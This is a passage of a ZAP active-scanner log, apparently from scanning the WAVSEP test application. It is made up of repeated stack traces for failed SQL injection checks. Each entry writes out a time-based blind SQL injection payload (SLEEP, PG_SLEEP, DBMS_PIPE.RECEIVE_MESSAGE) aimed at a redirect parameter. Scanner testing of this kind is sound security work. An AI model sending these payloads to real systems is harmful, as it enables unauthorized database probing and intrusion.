org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682142 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 2507=DBMS_PIPE.RECEIVE_MESSAGE(CHR(102)||CHR(102)||CHR(65)||CHR(83),5) AND (6960=6960] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 2507=DBMS_PIPE.RECEIVE_MESSAGE(CHR(102)||CHR(102)||CHR(65)||CHR(83),5) AND (6960=6960 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682143 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) AND (SELECT * FROM (SELECT(SLEEP(5)))oKuI) AND (8705=8705] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) AND (SELECT * FROM (SELECT(SLEEP(5)))oKuI) AND (8705=8705 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682144 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 1374=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(117)||CHR(120)||CHR(81),5)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 1374=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(117)||CHR(120)||CHR(81),5) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682144 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND (SELECT * FROM (SELECT(SLEEP(5)))CKBN)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND (SELECT * FROM (SELECT(SLEEP(5)))CKBN) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682145 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 8072=DBMS_PIPE.RECEIVE_MESSAGE(CHR(105)||CHR(109)||CHR(102)||CHR(80),5) AND ('HRZI'='HRZI] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 8072=DBMS_PIPE.RECEIVE_MESSAGE(CHR(105)||CHR(109)||CHR(102)||CHR(80),5) AND ('HRZI'='HRZI at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682146 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') AND (SELECT * FROM (SELECT(SLEEP(5)))BGrR) AND ('rVQh'='rVQh] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') AND (SELECT * FROM (SELECT(SLEEP(5)))BGrR) AND ('rVQh'='rVQh at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682147 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' AND (SELECT * FROM (SELECT(SLEEP(5)))iXLj) AND 'GzaQ'='GzaQ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' AND (SELECT * FROM (SELECT(SLEEP(5)))iXLj) AND 'GzaQ'='GzaQ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682148 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 6798=DBMS_PIPE.RECEIVE_MESSAGE(CHR(87)||CHR(115)||CHR(115)||CHR(90),5) AND 'UIhx'='UIhx] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 6798=DBMS_PIPE.RECEIVE_MESSAGE(CHR(87)||CHR(115)||CHR(115)||CHR(90),5) AND 'UIhx'='UIhx at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682148 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' AND (SELECT * FROM (SELECT(SLEEP(5)))jHfE) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' AND (SELECT * FROM (SELECT(SLEEP(5)))jHfE) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682150 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 2929=DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(110)||CHR(119)||CHR(85),5) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 2929=DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(110)||CHR(119)||CHR(85),5) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682150 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND (SELECT * FROM (SELECT(SLEEP(5)))erTR)-- rMiW] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND (SELECT * FROM (SELECT(SLEEP(5)))erTR)-- rMiW at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682151 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) AND 9807=(SELECT 9807 FROM PG_SLEEP(5)) AND (9933=9933] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) AND 9807=(SELECT 9807 FROM PG_SLEEP(5)) AND (9933=9933 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682152 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 4597=DBMS_PIPE.RECEIVE_MESSAGE(CHR(103)||CHR(71)||CHR(67)||CHR(83),5)-- aeaZ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 4597=DBMS_PIPE.RECEIVE_MESSAGE(CHR(103)||CHR(71)||CHR(67)||CHR(83),5)-- aeaZ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682153 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 7696=(SELECT 7696 FROM PG_SLEEP(5))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND 7696=(SELECT 7696 FROM PG_SLEEP(5)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at 